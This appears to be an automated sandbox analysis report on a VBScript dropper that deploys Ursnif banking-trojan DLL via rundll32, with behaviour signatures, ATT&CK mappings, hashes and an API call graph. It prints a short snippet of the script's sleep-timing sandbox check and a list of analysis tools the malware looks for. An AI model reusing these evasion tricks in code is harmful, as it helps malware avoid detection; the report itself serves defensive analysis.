                Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 23_2_70002116 IsProcessorFeaturePresent, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, 23_2_70002116
                Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 23_2_6FFA1A0A LoadLibraryA, GetProcAddress, 23_2_6FFA1A0A
                Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 23_2_700081A6 mov eax, dword ptr fs:[00000030h] | 23_2_700081A6
                Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 23_2_7000EB9A mov eax, dword ptr fs:[00000030h] | 23_2_7000EB9A
                Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 23_2_7004A96D mov eax, dword ptr fs:[00000030h] | 23_2_7004A96D
                Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 23_2_7004A89C mov eax, dword ptr fs:[00000030h] | 23_2_7004A89C
                Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 23_2_7004A4A3 push dword ptr fs:[00000030h] | 23_2_7004A4A3
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\melange.yuv,DllRegisterServer
                Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 23_2_70002116 IsProcessorFeaturePresent, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, 23_2_70002116
                Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 23_2_70001E38 SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, 23_2_70001E38
                Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 23_2_70006707 IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, 23_2_70006707

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Windows\System32\wscript.exe | File created: melange.yuv.0.dr
                Source: C:\Windows\SysWOW64\rundll32.exe | Code function: GetLocaleInfoA, GetSystemDefaultUILanguage, VerLanguageNameA, 23_2_6FFA11BF
                Source: C:\Windows\SysWOW64\rundll32.exe | Code function: EnumSystemLocalesW, 23_2_70009925
                Source: C:\Windows\SysWOW64\rundll32.exe | Code function: GetLocaleInfoW, GetLocaleInfoW, GetACP, 23_2_7001234F
                Source: C:\Windows\SysWOW64\rundll32.exe | Code function: GetACP, IsValidCodePage, _wcschr, _wcschr, GetLocaleInfoW, 23_2_70011BC3
                Source: C:\Windows\SysWOW64\rundll32.exe | Code function: GetUserDefaultLCID, IsValidCodePage, IsValidLocale, GetLocaleInfoW, GetLocaleInfoW, 23_2_70012524
                Source: C:\Windows\SysWOW64\rundll32.exe | Code function: GetLocaleInfoW, 23_2_70009E09
                Source: C:\Windows\SysWOW64\rundll32.exe | Code function: EnumSystemLocalesW, 23_2_70011E65
                Source: C:\Windows\SysWOW64\rundll32.exe | Code function: EnumSystemLocalesW, 23_2_70011EB0
                Source: C:\Windows\SysWOW64\rundll32.exe | Code function: EnumSystemLocalesW, 23_2_70011F4B
                Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 23_2_700022EB cpuid | 23_2_700022EB
                Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 23_2_6FFA10ED GetSystemTimeAsFileTime, _aulldiv, _snwprintf, CreateFileMappingW, GetLastError, GetLastError, MapViewOfFile, GetLastError, CloseHandle, GetLastError, 23_2_6FFA10ED
                Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 23_2_6FFA1F7C CreateEventA, GetVersion, GetCurrentProcessId, OpenProcess, GetLastError, 23_2_6FFA1F7C
                Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: procmon.exe
                Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: tcpview.exe
                Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: wireshark.exe
                Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: avz.exe
                Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: cports.exe
                Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: lordpe.exe
                Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: icesword.exe
                Source: wscript.exe, 00000000.00000003.741682153.00000274C5538000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: autoruns.exe
                Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741682153.00000274C5538000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ollydbg.exe
                Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: regshot.exe

                Stealing of Sensitive Information

                barindex
                Source: Yara match | File source: 23.2.rundll32.exe.2ca0000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 23.3.rundll32.exe.4638d0f.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 23.2.rundll32.exe.4b694a0.1.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 23.2.rundll32.exe.6ffa0000.2.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 23.2.rundll32.exe.4b694a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000017.00000002.882183834.0000000004B69000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000017.00000003.870417706.0000000004630000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY

                Remote Access Functionality

                barindex
                Source: Yara match | File source: 23.2.rundll32.exe.2ca0000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 23.3.rundll32.exe.4638d0f.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 23.2.rundll32.exe.4b694a0.1.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 23.2.rundll32.exe.6ffa0000.2.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 23.2.rundll32.exe.4b694a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000017.00000002.882183834.0000000004B69000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000017.00000003.870417706.0000000004630000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services, Drive-by Compromise, Exploit Public-Facing Application
                Execution: 121 Windows Management Instrumentation, 121 Scripting, 11 Native API, 1 Exploitation for Client Execution, Cron, Launchd, Scheduled Task, Command and Scripting Interpreter, PowerShell
                Persistence: Path Interception, Boot or Logon Initialization Scripts, Logon Script (Windows), Logon Script (Mac), Network Logon Script, Rc.common, Startup Items, Scheduled Task/Job, At (Linux)
                Privilege Escalation: 1 Process Injection, Boot or Logon Initialization Scripts, Logon Script (Windows), Logon Script (Mac), Network Logon Script, Rc.common, Startup Items, Scheduled Task/Job, At (Linux)
                Defense Evasion: 1 Masquerading, 13 Virtualization/Sandbox Evasion, 1 Disable or Modify Tools, 1 Process Injection, 1 Deobfuscate/Decode Files or Information, 121 Scripting, 3 Obfuscated Files or Information, 1 Rundll32, 1 File Deletion
                Credential Access: OS Credential Dumping, LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials, DCSync, Proc Filesystem, /etc/passwd and /etc/shadow
                Discovery: 1 System Time Discovery, 1 Query Registry, 24 Security Software Discovery, 13 Virtualization/Sandbox Evasion, 1 Application Window Discovery, 1 File and Directory Discovery, 135 System Information Discovery, Network Service Scanning, System Network Connections Discovery
                Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management, Shared Webroot, Software Deployment Tools
                Collection: 1 Archive Collected Data, Data from Removable Media, Data from Network Shared Drive, Input Capture, Keylogging, GUI Input Capture, Web Portal Capture, Credential API Hooking, Data Staged
                Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel, Exfiltration Over Alternative Protocol, Exfiltration Over Symmetric Encrypted Non-C2 Protocol, Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
                Command and Control: 1 Encrypted Channel, Junk Data, Steganography, Protocol Impersonation, Fallback Channels, Multiband Communication, Commonly Used Port, Application Layer Protocol, Web Protocols
                Network Effects: Eavesdrop on Insecure Network Communication, Exploit SS7 to Redirect Phone Calls/SMS, Exploit SS7 to Track Device Location, SIM Card Swap, Manipulate Device Communication, Jamming or Denial of Service, Rogue Wi-Fi Access Points, Downgrade to Insecure Protocols, Rogue Cellular Base Station
                Remote Service Effects: Remotely Track Device Without Authorization, Remotely Wipe Data Without Authorization, Obtain Device Cloud Backups
                Impact: Modify System Partition, Device Lockout, Delete Device Data, Carrier Billing Fraud, Manipulate App Store Rankings or Ratings, Abuse Accessibility Features, Data Encrypted for Impact, Generate Fraudulent Advertising Revenue, Data Destruction
                Source: gnAYDP69br2v.vbs | Detection: 0% | Scanner: Metadefender
                Source: C:\Users\user\AppData\Local\Temp\melange.yuv | Detection: 100% | Scanner: Avira | Label: TR/AD.UrsnifDropper.vsbvn
                Source: 23.2.rundll32.exe.2ca0000.0.unpack | Detection: 100% | Scanner: Avira | Label: HEUR/AGEN.1108158
                Source: 23.2.rundll32.exe.6ffa0000.2.unpack | Detection: 100% | Scanner: Avira | Label: HEUR/AGEN.1210012
                No Antivirus matches
                No contacted domains info
                No contacted IP infos
                Joe Sandbox Version:34.0.0 Boulder Opal
                Analysis ID:560537
                Start date:26.01.2022
                Start time:16:57:03
                Joe Sandbox Product:CloudBasic
                Overall analysis duration:0h 8m 37s
                Hypervisor based Inspection enabled:false
                Report type:full
                Sample file name:gnAYDP69br2v.vbs
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                Number of analysed new started processes analysed:24
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • HDC enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Detection:MAL
                Classification:mal100.troj.evad.winVBS@6/2@0/0
                EGA Information:
                • Successful, ratio: 100%
                HDC Information:
                • Successful, ratio: 3.8% (good quality ratio 3.6%)
                • Quality average: 80.3%
                • Quality standard deviation: 27.6%
                HCA Information:
                • Successful, ratio: 96%
                • Number of executed functions: 18
                • Number of non-executed functions: 49
                Cookbook Comments:
                • Adjust boot time
                • Enable AMSI
                • Found application associated with file extension: .vbs
                • Override analysis time to 240s for JS/VBS files not yet terminated
                • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                • Excluded IPs from analysis (whitelisted): 23.211.6.115
                • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, client.wns.windows.com, fs.microsoft.com, store-images.s-microsoft.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                • Not all processes where analyzed, report is missing behavior information
                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
                Time: 17:01:07 | Type: API Interceptor | Description: 1x Sleep call for process: wscript.exe modified
                Process:C:\Windows\System32\wscript.exe
                File Type:MS Windows 95 Internet shortcut text (URL=<https://adobe.com/>), ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):108
                Entropy (8bit):4.699454908123665
                Encrypted:false
                SSDEEP:3:J25YdimVVG/VClAWPUyxAbABGQEZapfpgtovn:J254vVG/4xPpuFJQxHvn
                MD5:99D9EE4F5137B94435D9BF49726E3D7B
                SHA1:4AE65CB58C311B5D5D963334F1C30B0BD84AFC03
                SHA-256:F5BC6CF90B739E9C70B6EA13F5445B270D8F5906E199270E22A2F685D989211E
                SHA-512:7B8A65FE6574A80E26E4D7767610596FEEA1B5225C3E8C7E105C6AC83F5312399EDB4E3798C3AF4151BCA8EF84E3D07D1ED1C5440C8B66B2B8041408F0F2E4F0
                Malicious:false
                Reputation:moderate, very likely benign file
                Preview:[{000214A0-0000-0000-C000-000000000046}]..Prop3=19,11..[InternetShortcut]..IDList=..URL=https://adobe.com/..
                Process:C:\Windows\System32\wscript.exe
                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                Category:dropped
                Size (bytes):696320
                Entropy (8bit):6.7012968874378664
                Encrypted:false
                SSDEEP:12288:TOgVktK4arTQrNn4iq0hS7M+M8uFKLrseaCoZSSi7Pq6b4bi:agWtja/QrNn4iqJY8v3sen1Dq3bi
                MD5:E999967D5B4EFD08C2C7FCCE637BC8AA
                SHA1:53B18ED4427ACFE90A6D8B7119942CCE7159B567
                SHA-256:8CD975F66D825DD37B06EF0465D160C65301726CC2A4BDFAD2EAFBAC14536F74
                SHA-512:95B12CAA57C273B6A059FE7E30D451FA447B100851B8C078EEB8E54AC5DB063E7565BCA72A7941BF7393E4E5526279709B586FE9B5F840D1B9B19BB611B1E4FB
                Malicious:true
                Antivirus:
                • Antivirus: Avira, Detection: 100%
                Reputation:low
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................*L.......z.............~......|......{.......z....*L........~......q.....................}.....Rich............PE..L......W...........!.....X...................p......................................i.....@..........................a..l....a..P............................p...3...8..T............................9..@............p..(............................text....W.......X.................. ..`.rdata.......p.......\..............@..@.data...,....p.......\..............@....gfids.......`.......j..............@..@.reloc...3...p...4...l..............@..B................................................................................................................................................................................................................................................................................................
                File type:ASCII text, with very long lines, with CRLF line terminators
                Entropy (8bit):4.767477149162963
                TrID:
                  File name:gnAYDP69br2v.vbs
                  File size:2488066
                  MD5:694a1a5ee37e5c161a37d4166a677850
                  SHA1:adfdbca254f8f810735cf2224aca1630af762bea
                  SHA256:0993c606df923ac8f174d7789fb494633c89d99d48747a91b866dc410cbd5814
                  SHA512:ea02fa36914d4013e3b7323acf97a69535ecb06b72dba1806a9d4eadc03b19e43063d1ee7bf4c86b0fc3a944c9f240e1bb1cd3674e437ec9f3fb403c7f60e324
                  SSDEEP:24576:cLx+U9YLFB1Dt2W5P6T8qd76yeD53H9cjnQG8m/cizoANcvc/ZoTnqo/7aU:+RHQG8KqANnK
                  File Content Preview:UISA = Timer()..For Ysdhh = 1 to 7..WScript.Sleep 1000:..Next..ASDQWE = Timer()..if ASDQWE - UISA < 5 Then..Do: Asrtd = 4: Loop..End if..const oL = 78..const iH = 95..' provenance denunciate. priggish, maxim Polyphemus lymphoma conscience Becky Gruyere do
                  Icon Hash:e8d69ece869a9ec4
                  No network behavior found

                  Target ID:0
                  Start time:16:58:08
                  Start date:26/01/2022
                  Path:C:\Windows\System32\wscript.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\gnAYDP69br2v.vbs"
                  Imagebase:0x7ff6ebb80000
                  File size:163840 bytes
                  MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  Target ID:21
                  Start time:17:01:06
                  Start date:26/01/2022
                  Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                  Imagebase:0x7ff7e33a0000
                  File size:488448 bytes
                  MD5 hash:A782A4ED336750D10B3CAF776AFE8E70
                  Has elevated privileges:true
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:moderate

                  Target ID:22
                  Start time:17:01:06
                  Start date:26/01/2022
                  Path:C:\Windows\System32\rundll32.exe
                  Wow64 process (32bit):false
                  Commandline:rundll32 C:\Users\user\AppData\Local\Temp\melange.yuv,DllRegisterServer
                  Imagebase:0x7ff7e5740000
                  File size:69632 bytes
                  MD5 hash:73C519F050C20580F8A62C849D49215A
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  Target ID:23
                  Start time:17:01:07
                  Start date:26/01/2022
                  Path:C:\Windows\SysWOW64\rundll32.exe
                  Wow64 process (32bit):true
                  Commandline:rundll32 C:\Users\user\AppData\Local\Temp\melange.yuv,DllRegisterServer
                  Imagebase:0x250000
                  File size:61952 bytes
                  MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000017.00000002.882183834.0000000004B69000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000017.00000003.870417706.0000000004630000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                  Reputation:high


                    Execution Graph

                    Execution Coverage:4.7%
                    Dynamic/Decrypted Code Coverage:12%
                    Signature Coverage:7.4%
                    Total number of Nodes:1303
                    Total number of Limit Nodes:46
16359->16368 16361 6ffa1ef6 GetProcAddress 16360->16361 16360->16368 16363 6ffa1f0c GetProcAddress 16361->16363 16361->16368 16365 6ffa1f22 GetProcAddress 16363->16365 16363->16368 16364->16346 16369 6ffa16e7 memcpy 16364->16369 16366 6ffa1f38 16365->16366 16365->16368 16386 6ffa1382 NtCreateSection 16366->16386 16368->16364 16392 6ffa1e7c HeapFree 16368->16392 16370 6ffa1720 16369->16370 16371 6ffa1757 16369->16371 16370->16371 16372 6ffa1739 memcpy 16370->16372 16371->16348 16372->16370 16374 6ffa1a2d 16373->16374 16376 6ffa125d 16373->16376 16375 6ffa1a3e LoadLibraryA 16374->16375 16374->16376 16378 6ffa1aa7 16374->16378 16375->16374 16375->16376 16376->16349 16379 6ffa2042 VirtualProtect 16376->16379 16377 6ffa1ab0 GetProcAddress 16377->16378 16378->16374 16378->16377 16380 6ffa126b 16379->16380 16381 6ffa208b 16379->16381 16380->16349 16380->16355 16381->16380 16382 6ffa20e1 VirtualProtect 16381->16382 16382->16381 16383 6ffa20f6 GetLastError 16382->16383 16383->16381 16384->16346 16385->16358 16387 6ffa13e6 16386->16387 16391 6ffa1413 16386->16391 16393 6ffa1b4a NtMapViewOfSection 16387->16393 16390 6ffa13fa memset 16390->16391 16391->16368 16392->16364 16394 6ffa13f4 16393->16394 16394->16390 16394->16391 17418 70000e14 17423 700001ff 17418->17423 17420 70000e22 __Deletegloballocale 17429 70000257 17420->17429 17422 70000e3c 17424 70000215 17423->17424 17425 7000020e 17423->17425 17426 70000213 17424->17426 17440 70000e65 RtlEnterCriticalSection 17424->17440 17436 70006d4b 17425->17436 17426->17420 17430 70000261 17429->17430 17431 70006d59 17429->17431 17433 70000274 17430->17433 17442 70000e73 RtlLeaveCriticalSection 17430->17442 17443 70006d34 RtlLeaveCriticalSection 17431->17443 17433->17422 17434 70006d60 17434->17422 17437 70006d50 17436->17437 17441 70006cec RtlEnterCriticalSection 17437->17441 17439 70006d57 17439->17426 17440->17426 17441->17439 17442->17433 17443->17434 16860 70001619 16861 70001625 ___FrameUnwindToState 16860->16861 16876 70001a4f 
16861->16876 16863 7000162c 16864 70001659 16863->16864 16875 70001631 ___scrt_is_nonwritable_in_current_image ___FrameUnwindToState _Atexit 16863->16875 16884 70002116 IsProcessorFeaturePresent 16863->16884 16888 700019b2 16864->16888 16867 70001668 __RTC_Initialize 16867->16875 16891 70001c29 16867->16891 16871 70001680 16872 70001c29 17 API calls 16871->16872 16873 7000168c ___scrt_initialize_default_local_stdio_options 16872->16873 16873->16875 16895 70001987 16873->16895 16877 70001a58 16876->16877 16899 700022eb IsProcessorFeaturePresent 16877->16899 16881 70001a69 16882 70001a6d 16881->16882 16910 70005ee5 16881->16910 16882->16863 16885 7000212c ___scrt_fastfail 16884->16885 16886 700021d4 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16885->16886 16887 7000221e 16886->16887 16887->16864 16959 70001a88 16888->16959 16890 700019b9 16890->16867 16964 70001bee 16891->16964 16894 700020d5 RtlInitializeSListHead 16894->16871 16896 7000198c ___scrt_release_startup_lock 16895->16896 16897 700022eb ___isa_available_init IsProcessorFeaturePresent 16896->16897 16898 70001995 16896->16898 16897->16898 16898->16875 16900 70001a64 16899->16900 16901 70005ea6 16900->16901 16902 70005eab ___vcrt_initialize_pure_virtual_call_handler ___vcrt_initialize_winapi_thunks 16901->16902 16918 7000629e 16902->16918 16906 70005ec1 16907 70005ecc 16906->16907 16932 700062da 16906->16932 16907->16881 16909 70005eb9 16909->16881 16911 70005eff 16910->16911 16912 70005eee 16910->16912 16911->16882 16913 700060af ___vcrt_uninitialize_ptd 6 API calls 16912->16913 16914 70005ef3 16913->16914 16915 700062da ___vcrt_uninitialize_locks RtlDeleteCriticalSection 16914->16915 16916 70005ef8 16915->16916 16955 70006595 16916->16955 16921 700062a7 16918->16921 16920 700062d0 16923 700062da ___vcrt_uninitialize_locks RtlDeleteCriticalSection 16920->16923 16921->16920 16922 70005eb5 16921->16922 16936 70006515 16921->16936 16922->16909 16924 7000607c 16922->16924 16923->16922 
16941 7000642a 16924->16941 16926 70006086 16927 70006091 16926->16927 16928 700064d8 ___vcrt_FlsSetValue 6 API calls 16926->16928 16927->16906 16929 7000609f 16928->16929 16930 700060ac 16929->16930 16946 700060af 16929->16946 16930->16906 16933 70006304 16932->16933 16934 700062e5 16932->16934 16933->16909 16935 700062ef RtlDeleteCriticalSection 16934->16935 16935->16933 16935->16935 16937 70006309 try_get_function 5 API calls 16936->16937 16938 7000652f 16937->16938 16939 7000654c InitializeCriticalSectionAndSpinCount 16938->16939 16940 70006538 16938->16940 16939->16940 16940->16921 16942 70006309 try_get_function 5 API calls 16941->16942 16943 70006444 16942->16943 16944 7000645c TlsAlloc 16943->16944 16945 7000644d 16943->16945 16945->16926 16947 700060bf 16946->16947 16948 700060b9 16946->16948 16947->16927 16950 70006464 16948->16950 16951 70006309 try_get_function 5 API calls 16950->16951 16952 7000647e 16951->16952 16953 70006495 TlsFree 16952->16953 16954 7000648a 16952->16954 16953->16954 16954->16947 16956 700065c4 16955->16956 16957 7000659e 16955->16957 16956->16911 16957->16956 16958 700065ae FreeLibrary 16957->16958 16958->16957 16960 70001a96 16959->16960 16963 70001a9b ___scrt_initialize_onexit_tables ___scrt_release_startup_lock 16959->16963 16961 70002116 ___scrt_fastfail 4 API calls 16960->16961 16960->16963 16962 70001b1e 16961->16962 16963->16890 16965 70001c12 16964->16965 16966 70001c0b 16964->16966 16973 70008ad2 16965->16973 16970 70008a66 16966->16970 16969 7000167b 16969->16894 16971 70008ad2 __onexit 17 API calls 16970->16971 16972 70008a78 16971->16972 16972->16969 16976 70008808 16973->16976 16977 70008814 ___FrameUnwindToState 16976->16977 16984 70006cec RtlEnterCriticalSection 16977->16984 16979 70008822 16985 70008863 16979->16985 16981 7000882f 16995 70008857 16981->16995 16984->16979 16986 7000887f 16985->16986 16987 700088f6 __onexit __crt_fast_encode_pointer 16985->16987 16986->16987 16988 700088d6 16986->16988 16998 7000fcf9 
16986->16998 16987->16981 16988->16987 16990 7000fcf9 __onexit 17 API calls 16988->16990 16992 700088ec 16990->16992 16991 700088cc 16993 700074e6 _free 14 API calls 16991->16993 16994 700074e6 _free 14 API calls 16992->16994 16993->16988 16994->16987 17031 70006d34 RtlLeaveCriticalSection 16995->17031 16997 70008840 16997->16969 16999 7000fd21 16998->16999 17000 7000fd06 16998->17000 17001 7000fd30 16999->17001 17007 70013773 16999->17007 17000->16999 17002 7000fd12 17000->17002 17012 7000786b 17001->17012 17004 70006ddb __Wcscoll 14 API calls 17002->17004 17006 7000fd17 ___scrt_fastfail 17004->17006 17006->16991 17008 70013793 RtlSizeHeap 17007->17008 17009 7001377e 17007->17009 17008->17001 17010 70006ddb __Wcscoll 14 API calls 17009->17010 17011 70013783 __cftoe 17010->17011 17011->17001 17013 70007883 17012->17013 17014 70007878 17012->17014 17016 7000788b 17013->17016 17022 70007894 __Wcsxfrm 17013->17022 17024 70007520 17014->17024 17019 700074e6 _free 14 API calls 17016->17019 17017 70007899 17020 70006ddb __Wcscoll 14 API calls 17017->17020 17018 700078be RtlReAllocateHeap 17021 70007880 17018->17021 17018->17022 17019->17021 17020->17021 17021->17006 17022->17017 17022->17018 17023 70007d94 new 2 API calls 17022->17023 17023->17022 17025 7000755e 17024->17025 17029 7000752e __Wcsxfrm 17024->17029 17026 70006ddb __Wcscoll 14 API calls 17025->17026 17028 7000755c 17026->17028 17027 70007549 RtlAllocateHeap 17027->17028 17027->17029 17028->17021 17029->17025 17029->17027 17030 70007d94 new 2 API calls 17029->17030 17030->17029 17031->16997 16804 700017a8 16805 700017b4 ___FrameUnwindToState 16804->16805 16806 700017dd dllmain_raw 16805->16806 16807 700017d8 16805->16807 16810 700017c3 ___FrameUnwindToState 16805->16810 16808 700017f7 dllmain_crt_dispatch 16806->16808 16806->16810 16817 6ffee850 16807->16817 16808->16807 16808->16810 16812 70001844 16812->16810 16813 7000184d dllmain_crt_dispatch 16812->16813 16813->16810 16815 70001860 dllmain_raw 
16813->16815 16814 6ffee850 17 API calls 16816 70001830 dllmain_crt_dispatch dllmain_raw 16814->16816 16815->16810 16816->16812 16818 6ffee8a6 16817->16818 16821 6ffeb990 16818->16821 16822 6ffeb9eb 16821->16822 16823 6ffed569 16822->16823 16824 6ffecd2f GetEnvironmentVariableW 16822->16824 16825 6ffece44 Sleep 16822->16825 16826 6ffedaa4 16823->16826 16830 7004a96d 16823->16830 16824->16822 16825->16822 16850 70001592 16826->16850 16828 6ffedc96 16828->16812 16828->16814 16831 7004a9b2 16830->16831 16832 7004aa4e VirtualAlloc 16831->16832 16833 7004aa10 VirtualAlloc 16831->16833 16834 7004aa94 16832->16834 16833->16832 16835 7004aaad VirtualAlloc 16834->16835 16855 7004a61c 16835->16855 16838 7004abe7 VirtualProtect 16840 7004ac06 16838->16840 16842 7004ac39 16838->16842 16839 7004ab16 16839->16838 16841 7004ac14 VirtualProtect 16840->16841 16840->16842 16841->16840 16843 7004acbb VirtualProtect 16842->16843 16844 7004acf6 VirtualProtect 16843->16844 16846 7004ad53 VirtualFree GetPEB 16844->16846 16847 7004ad7f 16846->16847 16857 7004a89c GetPEB 16847->16857 16849 7004adc3 16851 7000159b 16850->16851 16852 7000159d 16850->16852 16851->16828 16859 70001e38 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 16852->16859 16854 70001f57 16854->16828 16856 7004a62b VirtualFree 16855->16856 16856->16839 16858 7004a8cc 16857->16858 16858->16849 16859->16854 19682 7000172b 19683 70001737 ___FrameUnwindToState 19682->19683 19684 70001740 ___FrameUnwindToState 19683->19684 19685 70001766 19683->19685 19686 70002116 ___scrt_fastfail 4 API calls 19683->19686 19692 70001a1f 19685->19692 19686->19685 19688 7000176b 19701 70001799 19688->19701 19690 7000177e 19704 70001bc6 19690->19704 19693 70001a24 ___scrt_release_startup_lock 19692->19693 19694 70001a28 19693->19694 19696 70001a34 19693->19696 19695 70008a7c _Atexit 14 API calls 19694->19695 19697 70001a32 19695->19697 19698 70001a41 19696->19698 19699 70008142 _Atexit 23 API calls 
